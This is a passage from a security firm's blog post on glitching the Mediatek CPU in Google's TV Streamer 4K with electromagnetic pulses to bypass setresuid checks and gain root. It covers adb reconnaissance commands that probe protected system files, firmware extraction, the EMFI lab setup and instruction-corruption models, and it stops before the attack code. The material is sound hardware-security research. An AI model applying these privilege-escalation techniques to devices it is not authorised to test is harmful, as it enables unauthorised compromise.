<!DOCTYPE html>
<html lang="en-us">
<head>
	<meta charset="utf-8">

	<!-- mobile responsive meta -->
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<!-- title -->
	
	<title>setresuid(⚡): Glitching Google&#39;s TV Streamer from adb to root | Raelize</title>

	<!-- meta description -->
	
	
	
	<meta name="description" content="A single EM glitch on Google&#39;s TV Streamer 4K corrupts the Mediatek MT8696 CPU mid-syscall, bypassing kernel checks to escalate from an adb shell to uid 0.">
	
	<meta name="author" content="Raelize B.V.">

	<!-- canonical -->
	<link rel="canonical" href="https://raelize.com/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/">

	<!-- Open Graph -->
	
	
	
	<meta property="og:site_name" content="Raelize">
	<meta property="og:title" content="setresuid(⚡): Glitching Google&#39;s TV Streamer from adb to root">
	<meta property="og:description" content="A single EM glitch on Google&#39;s TV Streamer 4K corrupts the Mediatek MT8696 CPU mid-syscall, bypassing kernel checks to escalate from an adb shell to uid 0.">
	<meta property="og:type" content="article">
	<meta property="og:url" content="https://raelize.com/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/">
	<meta property="og:image" content="https://raelize.com/images/blog/tvstreamer-emfi-original/streamer-product.png">
	
	<meta property="article:published_time" content="2026-05-17T23:00:00&#43;02:00">
	<meta property="article:modified_time" content="2026-05-17T23:00:00&#43;02:00">
	

	<!-- Twitter Card -->
	<meta name="twitter:card" content="summary_large_image">
	<meta name="twitter:site" content="@raelizecom">
	<meta name="twitter:title" content="setresuid(⚡): Glitching Google&#39;s TV Streamer from adb to root">
	<meta name="twitter:description" content="A single EM glitch on Google&#39;s TV Streamer 4K corrupts the Mediatek MT8696 CPU mid-syscall, bypassing kernel checks to escalate from an adb shell to uid 0.">
	<meta name="twitter:image" content="https://raelize.com/images/blog/tvstreamer-emfi-original/streamer-product.png">

	<!-- JSON-LD structured data -->
	
	<script type="application/ld+json">
	{
		"@context": "https://schema.org",
		"@type": "BlogPosting",
		"headline": "\"setresuid(⚡): Glitching Google's TV Streamer from adb to root\"",
		"description": "\"A single EM glitch on Google's TV Streamer 4K corrupts the Mediatek MT8696 CPU mid-syscall, bypassing kernel checks to escalate from an adb shell to uid 0.\"",
		"url": "https:\/\/raelize.com\/blog\/setresuid-glitching-google-tv-streamer-from-adb-to-root\/",
		"datePublished": "2026-05-17T23:00:00\u002b02:00",
		"dateModified": "2026-05-17T23:00:00\u002b02:00",
		"image": "https:\/\/raelize.com\/images\/blog\/tvstreamer-emfi-original\/streamer-product.png",
		"author": {"@type": "Organization", "name": "Raelize"},
		"publisher": {
			"@type": "Organization",
			"name": "Raelize",
			"logo": {"@type": "ImageObject", "url": "https:\/\/raelize.com\/images\/logo.png"}
		},
		"mainEntityOfPage": {"@type": "WebPage", "@id": "https:\/\/raelize.com\/blog\/setresuid-glitching-google-tv-streamer-from-adb-to-root\/"}
	}
	</script>
	

	<!-- RSS feed discovery -->
	

	<meta name="generator" content="Hugo 0.145.0">

	<!-- plugins -->
	
	<link rel="stylesheet" href="https://raelize.com/plugins/bootstrap/bootstrap.min.css">
	
	<link rel="stylesheet" href="https://raelize.com/plugins/themify-icons/themify-icons.css">
	
	<link rel="stylesheet" href="https://raelize.com/plugins/magnific-popup/magnific-popup.css">
	
	<link rel="stylesheet" href="https://raelize.com/plugins/slick/slick.css">
	
	<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Anaheim%7cQuattrocento&#43;Sans:400,700&amp;display=swap">
	

	<!-- Main Stylesheet -->
	
	<link rel="stylesheet" href="https://raelize.com/css/style.min.css" media="screen">

	<!-- Custom stylesheet - for your changes -->
	
  <link rel="stylesheet" href="https://raelize.com/css/custom.min.css" media="screen">

	<!--Favicon-->
	<link rel="icon" type="image/png" sizes="32x32" href="https://raelize.com/images/favicon-32x32.png">
	<link rel="icon" type="image/png" sizes="16x16" href="https://raelize.com/images/favicon-16x16.png">
	<link rel="shortcut icon" href="https://raelize.com/images/favicon.ico">
	<link rel="apple-touch-icon" href="https://raelize.com/images/favicon.png">

	
	<!-- Global Site Tag (gtag.js) - Google Analytics -->
	<script async src="https://www.googletagmanager.com/gtag/js?id=G-WYF12SDGBM"></script>
	<script>
	  window.dataLayer = window.dataLayer || [];
	  function gtag(){dataLayer.push(arguments);}
	  gtag('js', new Date());

	  gtag('config', 'G-WYF12SDGBM');
	</script>
	

	<!-- Custom javascript by Raelize (defines brand wordmark variables used inline in body) -->
	
	<script src="https://raelize.com/js/custom.min.js"></script>
</head>


<body id="body" data-spy="scroll" data-target=".navbar" data-offset="55">
  <div id="content">
    
 <section class="sticky-top navigation">
	<div class="container">
		<nav class="navbar navbar-expand-lg navbar-dark">
			<a class="navbar-brand p-0" href="/">
				
				<img class="lozad" data-src="https://raelize.com/images/logo.png" alt="Raelize - Embedded Device Security Testing, Consultancy &amp; Training" height="42">
				
			</a>

			<button class="navbar-toggler rounded-0" type="button" data-toggle="collapse" data-target="#navigation">
				<span class="navbar-toggler-icon"></span>
			</button>

			<div class="collapse navbar-collapse" id="navigation">
				<ul class="navbar-nav ml-auto">
					
					<li class="nav-item">
            <a class="nav-link" href="/about">about</a>
					</li>
					
					<li class="nav-item">
            <a class="nav-link" href="/#services">overview</a>
					</li>
					
					<li class="nav-item">
            <a class="nav-link" href="/training">training</a>
					</li>
					
					<li class="nav-item">
            <a class="nav-link" href="/consultancy">consultancy</a>
					</li>
					
					<li class="nav-item">
            <a class="nav-link" href="/testing">testing</a>
					</li>
					
					<li class="nav-item">
            <a class="nav-link" href="/publications">publications</a>
					</li>
					
					<li class="nav-item">
            <a class="nav-link" href="/blog">blog</a>
					</li>
					
					<li class="nav-item">
            <a class="nav-link" href="/#contact">contact</a>
					</li>
					
				</ul>
				
			</div>
		</nav>
	</div>
</section>


<section class="section">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 offset-lg-2 text-center">
                <hr />
                <h1>setresuid(⚡): Glitching Google&#39;s TV Streamer from adb to root</h1>
                
                <p>Sunday, May 17, 2026</p>
                <hr />
                
            </div>
            <div class="col-lg-8 offset-lg-2">
                <div class="post-single-content" background-color="0xff"><!--
    TL;DR
-->
<blockquote>
<p><strong>TL;DR:</strong> We presented this attack at <a href="https://hardwear.io/setresuid%e2%9a%a1-glitching-googles-tv-streamer-from-adb-to-root/">hardwear.io NL 2025</a>. Starting from an unprivileged <code>adb</code> shell on Google&rsquo;s TV Streamer 4K, we use an ElectroMagnetic (EM) glitch on the Mediatek MT8696&rsquo;s CPU to bypass the kernel-side capability checks of  the <code>setresuid</code> syscall. The kernel falls through to <code>commit_creds()</code>, our calling process gets <code>uid = 0</code>, and we drop a <code>telnetd-static</code> listener on the device. We&rsquo;re not there all the way, SELinux is still in effect, but the we glitched from shell to root on a 1.8 GHz Cortex-A55 CPU.</p></blockquote>
<!--
    Contents
-->
<h2 id="contents">Contents</h2>
<ol>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#introduction">Introduction</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#target">Target</a>
<ul>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#interfaces">Interfaces</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#components">Components</a></li>
</ul>
</li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#reconnaissance">Reconnaissance</a>
<ul>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#serial-interface">Serial interface</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#flash-dump">Flash dump</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#android-debug-bridge-adb">Android Debug Bridge (ADB)</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#firmware-update">Firmware update</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#generic-kernel-image-gki">Generic Kernel Image (GKI)</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#security-features">Security features</a></li>
</ul>
</li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#fault-injection">Fault Injection</a>
<ul>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#the-glitch">The glitch</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#the-setup">The setup</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#fault-models">Fault models</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#applicable-attacks">Applicable attacks</a></li>
</ul>
</li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#characterization">Characterization</a>
<ul>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#characterization-code">Code</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#characterization-flow">Flow</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#glitch-parameter-search">Glitch parameter search</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#characterization-results">Results</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#characterization-responses">Responses</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#quad-core-analysis">Quad-Core analysis</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#fixing-the-probe">Fixing the probe</a></li>
</ul>
</li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#getting-root">Getting root</a>
<ul>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#glitching-setresuid">Glitching setresuid</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#attack-code">Attack code</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#attack-flow">Attack flow</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#successful-attack">Successful attack</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#limitations">Limitations</a></li>
</ul>
</li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#bonus-syslog-dump">Bonus: syslog dump</a></li>
<li><a href="/blog/setresuid-glitching-google-tv-streamer-from-adb-to-root/#takeaways">Takeaways</a></li>
</ol>
<!--
    Introduction
-->
<h2 id="introduction">Introduction</h2>
<p>We started analyzing the security of the <strong>Google TV Streamer 4K</strong>, the successor to the Google Chromecast. As always, we asked ourselves, what can we do on this device in a Raelize way? Besides analyzing its lower-level components, like the bootloader and the Trusted Execution Environment (TEE), this often entails injecting hardware glitches into the device.</p>
<p>This post follows our <a href="/upload/research/2025/hwio-nl-2025_setresuid-glitching-google-tv-streamer-from-adb-to-root.pdf">hardwear.io NL 2025 talk</a>, where we discussed the unboxing all the way to a root shell, using one ElectroMagnetic (EM) glitch affecting the kernel&rsquo;s <code>setresuid</code> syscall. This blog post is a long(er) form of our presentation.</p>
<!--
    Target
-->
<h2 id="target">Target</h2>
<p>We acquired the Google TV Streamer when it came out.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/streamer-product.png">
        <img src="/images/blog/tvstreamer-emfi-original/streamer-product.png" alt="Google TV Streamer 4K product photo" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>Google's TV Streamer 4K — it streams content on your screen.</em></p>
<p>It&rsquo;s a small white plastic puck that sits next to your TV, streams 4K content, and runs <strong>Android 14</strong>. The exact build we worked on is:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>google/kirkwood/kirkwood:14/UTTK.250729.004/14066481:user/release-keys
</span></span></code></pre></div><p>It&rsquo;s a normal Android device with all the trimmings — apps, accounts, a remote, an HDMI output.</p>
<h3 id="interfaces">Interfaces</h3>
<p>The USB-C port does both power and data.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/streamer-interfaces.png">
        <img src="/images/blog/tvstreamer-emfi-original/streamer-interfaces.png" alt="External interfaces: LED, button, USB-C, Ethernet, HDMI" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>The external surface of the device is intentionally minimal: LED, button, USB-C, Ethernet, HDMI.</em></p>
<p>From the outside, the device is what it claims to be: a network endpoint and a video sink.</p>
<h3 id="components">Components</h3>
<p>After opening the device you&rsquo;re presented with a fairly complex PCB with a bunch of components.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/streamer-pcb-components.png">
        <img src="/images/blog/tvstreamer-emfi-original/streamer-pcb-components.png" alt="Top and bottom of the Streamer PCB with components" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>The PCB, top and bottom</em></p>
<p>The Mediatek MT8696 SoC is a quad-core ARM Cortex-A55 SoC clocked at roughly <strong>1.8 GHz</strong>. The actual speed of each core depends of course on the operating system (i.e., Android) controlling it. Hence, it may run at a significantly lower speed at times.</p>
<p>The components are (roughly) connected as is shown below.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/streamer-block-diagram.png">
        <img src="/images/blog/tvstreamer-emfi-original/streamer-block-diagram.png" alt="Block diagram of the Streamer's components around the MT8696" loading="lazy" style="width:60%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>Rough block diagram of the Streamer</em></p>
<p>During this blog post we focus mostly on the MT8696 SoC.</p>
<!--
    Reconnaissance
-->
<h2 id="reconnaissance">Reconnaissance</h2>
<p>Before we reach for the EM probe, we want to understand what we can do with software alone — what we can read, what we can run, and where the chip says &ldquo;no&rdquo;.</p>
<h3 id="serial-interface">Serial interface</h3>
<p>We did not use the serial interface for the attack described in this blog post.</p>
<h3 id="flash-dump">Flash dump</h3>
<p>We did not lift the eMMC off the board for an offline dump. Given the package is standard eMMC it should be relatively easy to do it in-situ as well. However, we did not take this route.</p>
<h3 id="android-debug-bridge-adb">Android Debug Bridge (ADB)</h3>
<p>ADB is <strong>not</strong> enabled by default. But it is enabled the same way it is on every Android device: tap <strong>Build number</strong> seven times in the menu and set <strong>USB debugging</strong> in the <strong>Developer Options</strong>. Once enabled, the device shows up nicely:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>niek@laptop:~$ adb devices
</span></span><span style="display:flex;"><span>List of devices attached
</span></span><span style="display:flex;"><span>55141HXXXXXXXX  device
</span></span></code></pre></div><p><strong>What we <em>can</em> do over ADB</strong></p>
<p>Get basic info:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>niek@laptop:~$ adb shell id
</span></span><span style="display:flex;"><span><span style="color:#8be9fd;font-style:italic">uid</span><span style="color:#ff79c6">=</span>2000<span style="color:#ff79c6">(</span>shell<span style="color:#ff79c6">)</span> <span style="color:#8be9fd;font-style:italic">gid</span><span style="color:#ff79c6">=</span>2000<span style="color:#ff79c6">(</span>shell<span style="color:#ff79c6">)</span> <span style="color:#8be9fd;font-style:italic">groups</span><span style="color:#ff79c6">=</span>2000<span style="color:#ff79c6">(</span>shell<span style="color:#ff79c6">)</span>,... <span style="color:#8be9fd;font-style:italic">context</span><span style="color:#ff79c6">=</span>u:r:shell:s0
</span></span><span style="display:flex;"><span>niek@laptop:~$ adb shell getprop ro.build.fingerprint
</span></span><span style="display:flex;"><span>google/kirkwood/kirkwood:14/UTTK.250729.004/14066481:user/release-keys
</span></span></code></pre></div><p>Pull the kernel config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>niek@laptop:~$ adb pull /proc/config.gz
</span></span><span style="display:flex;"><span>/proc/config.gz: <span style="color:#bd93f9">1</span> file pulled, <span style="color:#bd93f9">0</span> skipped. 8.4 MB/s <span style="color:#ff79c6">(</span><span style="color:#bd93f9">41604</span> bytes in 0.005s<span style="color:#ff79c6">)</span>
</span></span></code></pre></div><p>Run our own code as the <code>shell</code> user:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>niek@laptop:~$ <span style="color:#8be9fd;font-style:italic">$NDK_CC</span> program.c -o program
</span></span><span style="display:flex;"><span>niek@laptop:~$ adb push program /data/local/tmp
</span></span><span style="display:flex;"><span>niek@laptop:~$ adb shell /data/local/tmp/program
</span></span><span style="display:flex;"><span>I&#39;m a program running as the shell user!
</span></span></code></pre></div><p><strong>What we <em>cannot</em> do over ADB</strong></p>
<p>Most of the interesting things:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>niek@laptop:~$ adb shell cat /proc/cmdline
</span></span><span style="display:flex;"><span>cat: /proc/cmdline: Permission denied
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>niek@laptop:~$ adb shell dmesg
</span></span><span style="display:flex;"><span>dmesg: klogctl: Permission denied
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>niek@laptop:~$ adb pull /dev/block/by-name/boot_a
</span></span><span style="display:flex;"><span>adb: error: failed to stat remote object <span style="color:#f1fa8c">&#39;/dev/block/by-name/boot_a&#39;</span>: Permission denied
</span></span></code></pre></div><p>The <code>shell</code> user is uid <code>2000</code>, SELinux domain <code>u:r:shell:s0</code>, and the policy is tight.</p>
<p>To summarize, we can do a lot of useful things, even run arbitrary code, but we cannot <em>access</em> most things we&rsquo;d want to access. We&rsquo;re restricted by the  Android user-and-SELinux sandbox, exactly as we would be on a modern Android phone like a Pixel.</p>
<h3 id="firmware-update">Firmware update</h3>
<p>We figured out how to download the latest OTA firmware from Google&rsquo;s server. We wrote a small helper that talks to Google&rsquo;s OTA endpoint and fetches the latest available update.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#ff79c6">(</span>.venv<span style="color:#ff79c6">)</span> niek@laptop:~/.../repo/ota$ ./get_ota_url.py
</span></span><span style="display:flex;"><span><span style="color:#8be9fd;font-style:italic">update_title</span>             <span style="color:#ff79c6">=</span> UTTK.250729.004
</span></span><span style="display:flex;"><span><span style="color:#8be9fd;font-style:italic">update_target_sdk_level</span>  <span style="color:#ff79c6">=</span> <span style="color:#bd93f9">34</span>
</span></span><span style="display:flex;"><span><span style="color:#8be9fd;font-style:italic">update_size</span>              <span style="color:#ff79c6">=</span> 740.1 MB
</span></span><span style="display:flex;"><span><span style="color:#8be9fd;font-style:italic">update_url</span>               <span style="color:#ff79c6">=</span> https://.../21b8ea323862944e3d2c90bc9bdd433122d52f1c.zip
</span></span></code></pre></div><p>These OTA updates can be unpacked using <a href="https://github.com/tobyxdd/android-ota-extractor"><code>android-ota-extractor</code></a>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ unzip 21b8ea323862944e3d2c90bc9bdd433122d52f1c.zip payload.bin
</span></span><span style="display:flex;"><span>$ ../android-ota-extractor payload.bin
</span></span><span style="display:flex;"><span>Parsing payload...
</span></span><span style="display:flex;"><span>Block size: 4096, Partition count: <span style="color:#bd93f9">19</span>
</span></span><span style="display:flex;"><span>$ ls *.img
</span></span><span style="display:flex;"><span>boot.img init_boot.img mcupm.img odm.img product.img system_ext.img tee.img
</span></span><span style="display:flex;"><span>vbmeta_system.img vendor_boot.img vendor.img dtbo.img lk.img odm_dlkm.img
</span></span><span style="display:flex;"><span>preloader_raw.img system_dlkm.img system.img vbmeta.img vbmeta_vendor.img vendor_dlkm.img
</span></span></code></pre></div><p>Some partitions look encrypted (e.g. <code>tee.img</code>), but others, including <code>boot.img</code> are unencrypted. Unpacking <code>boot.img</code> gives us a raw ARM64 kernel:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ ./mkbootimg/unpack_bootimg.py --boot_img boot.img
</span></span><span style="display:flex;"><span>$ file out/kernel
</span></span><span style="display:flex;"><span>out/kernel: Linux kernel ARM64 boot executable Image, little-endian, 4K pages
</span></span></code></pre></div><p>This is exactly what we need in order to find interesting code constructions in the Linux kernel that facilitate a Raelizesque attack.</p>
<h3 id="generic-kernel-image-gki">Generic Kernel Image (GKI)</h3>
<p>However, then we raelized something. The kernel inside <code>boot.img</code> is just the <a href="https://source.android.com/docs/core/architecture/kernel/generic-kernel-image">Android GKI</a> kernel (i.e., <code>android14-5.15-2025-05_r1</code>), which Google publishes openly with source, license info, and even a <strong>debug build</strong>. We verified the kernel from the OTA firmware and the GKI are exactly the same.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ sha1sum boot.img/out/kernel boot-5.15.img/out/kernel
</span></span><span style="display:flex;"><span>dab1f04e21dd3fb771e8bda955f66e92c56d7f5c  boot.img/out/kernel
</span></span><span style="display:flex;"><span>dab1f04e21dd3fb771e8bda955f66e92c56d7f5c  boot-5.15.img/out/kernel
</span></span></code></pre></div><p>This makes the rest of the work much easier: we have the exact kernel source and can also run a debug build for inspection without ever touching the device&rsquo;s flash.</p>
<h3 id="security-features">Security features</h3>
<p>Stepping back, the Streamer has the standard modern-Android security posture:</p>
<ul>
<li><strong>Secure Boot</strong> rooted in the hardware (i.e., SoC)</li>
<li><strong>Android Verified Boot (AVB)</strong> on every partition (i.e., extension of Secure Boot)</li>
<li><strong>Hardened Android kernel</strong></li>
<li><strong>Trusted Execution Environment (TEE)</strong></li>
<li>&hellip;</li>
</ul>
<p>The only obviously absent piece versus a Pixel 9 is the external Titan-style security chip. From an attacker&rsquo;s perspective: this is a real Android device, likely not that easy to break into.</p>
<!--
    Fault Injection
-->
<h2 id="fault-injection">Fault Injection</h2>
<p>The most logical way in on this device is definitely a software vulnerability. However, we decided to see how far we can get with a Fault Injection (FI) attack.</p>
<p><strong>Fault Injection (FI)</strong> is used to force a chip, or parts thereof, outside of its intended operating conditions. This allows, among other things, an attacker to corrupt the instructions that are executed by the CPU. The idea is to corrupt 1 or more instructions without taking the whole device down and affecting it&rsquo;s continuation. If we can corrupt <em>one</em> instruction inside an in-kernel security check, we may convince the kernel to do something its source code says it must not do. A glitch triggers a <em>hardware vulnerability</em>, which voids the any software security model as it assumes the instructions are executed correctly.</p>
<h3 id="the-glitch">The glitch</h3>
<p>We chose <strong>ElectroMagnetic Fault Injection (EMFI)</strong> because it is local (i.e., it targets parts of the chip) and well-suited to a normally packaged SoC (i.e., no a stacked chip). A coil very close to the die generates a short, strong magnetic pulse. Eddy currents in the silicon disturb whatever the CPU is doing at that exact moment.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/emfi-coil-principle.png">
        <img src="/images/blog/tvstreamer-emfi-original/emfi-coil-principle.png" alt="Coil generating a localized EM field over the die" loading="lazy" style="width:40%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>High current through the coil generates a localized EM field</em></p>
<p>As the EM field has a localized effect, we need to find a sensitive location on the chip&rsquo;s surface. Not all locations will have the same effect. We need to tune the strength of the electromagnetic field. Moreover, we need to figure out when to inject the glitch.</p>
<h3 id="the-setup">The setup</h3>
<p>The setup that we used is shown below.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/setup-photo.png">
        <img src="/images/blog/tvstreamer-emfi-original/setup-photo.png" alt="Physical EMFI lab setup used against the Streamer" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>The physical setup as used in the lab.</em></p>
<p>A diagram of this setup is shown below.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/setup-diagram.png">
        <img src="/images/blog/tvstreamer-emfi-original/setup-diagram.png" alt="Block diagram of glitcher, probe, XYZ stage and target" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>Block diagram of the setup.</em></p>
<p>A close-up of the EMFI probe on the surface of the chip.</p>
<p style="text-align:center;">
    <a href="/images/blog/tvstreamer-emfi-original/probe-closeup.png">
        <img src="/images/blog/tvstreamer-emfi-original/probe-closeup.png" alt="Close-up of the EMFI probe on the MT8696 surface" loading="lazy" style="width:80%; max-width:80%">
    </a>
</p>
<p style="text-align:center; color:#666; font-size:0.9em;"><em>The EMFI probe positioned on the chip's surface</em></p>
<p>Everything is driven from the host laptop. A <strong>YEPKIT YKUSH3</strong> software-controllable USB hub sits in front of the Streamer so we can power-cycle the target between attempts. The <strong>Keysight Spider (DS1180A)</strong> is the glitcher, it controls power and the timing. The <strong>Keysight EM-FI Transient Probe</strong> generates the EM pulse and sits microns above the chip on a <strong>Keysight XYZ stage</strong>, which moves the probe over the chip&rsquo;s surface. The <strong>Google TV Streamer</strong> itself is reachable over USB-C for both power and adb communication.</p>
<p>Interestingly, we used no <strong>trigger</strong>. The adb-shell user has no GPIO to poke; we cannot precisely time a pulse to a syscall from outside. So we run our target code in a tight loop on the chip and let the glitcher fire essentially asynchronously. Sooner or later, a pulse lands inside the window we care about.</p>
<p>We could generate a specific pattern in the power consumption to generate a stable trigger. However, this would increase the complexity of the setup, as more hardware is required, hence, we decided to not go that route.</p>
<h3 id="fault-models">Fault models</h3>
<p>Generally we are interesting in glitches that affect bits in instructions (i.e., they get corrupted). Considering the following code snippet, which increases a counter to four (4) using <code>add</code> instructions.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-armasm" data-lang="armasm"><span style="display:flex;"><span>mov <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x0</span><span style="color:#6272a4">;
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x1</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span><span style="color:#6272a4">;
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x1</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span><span style="color:#6272a4">;
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x1</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span><span style="color:#6272a4">;
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x1</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span><span style="color:#6272a4">;
</span></span></span></code></pre></div><p>The counter (<code>x1</code>) is now <code>4</code> after the last <code>add</code>.</p>
<p><strong>Operand corruption</strong></p>
<p>A <code>add x1, x1, #0x1</code>, encoded <code>0x91000421</code>, becomes <code>0x91000420</code> (i.e., the immediate <code>#1</code> becomes <code>#0</code>).</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-armasm" data-lang="armasm"><span style="display:flex;"><span>mov <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x0</span><span style="color:#6272a4">;
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x1</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span><span style="color:#6272a4">;
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x1</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span><span style="color:#6272a4">;
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x0</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span><span style="color:#6272a4">; // operand affected
</span></span></span><span style="display:flex;"><span><span style="color:#6272a4"></span>add <span style="color:#50fa7b">x1</span>, <span style="color:#50fa7b">x1</span>, #<span style="color:#bd93f9">0x1</span><span style="color:#6272a4">;
</span></span></span></code></pre></div><p>The counter (<code>x1</code>) is <code>3</code> after the last <code>add</code>, not <code>4</code>.</p>
<p><strong>Opcode corruption.</strong></p>
<p>The encoding <code>0x91000421</code> (an <code>add</code>) becomes <code>0x90000421</code>, which is <code>adrp x1, #&lt;some-pc-relative&gt;</code>. The destination is now a large absolute-ish address rather than a small counter increment:</p>
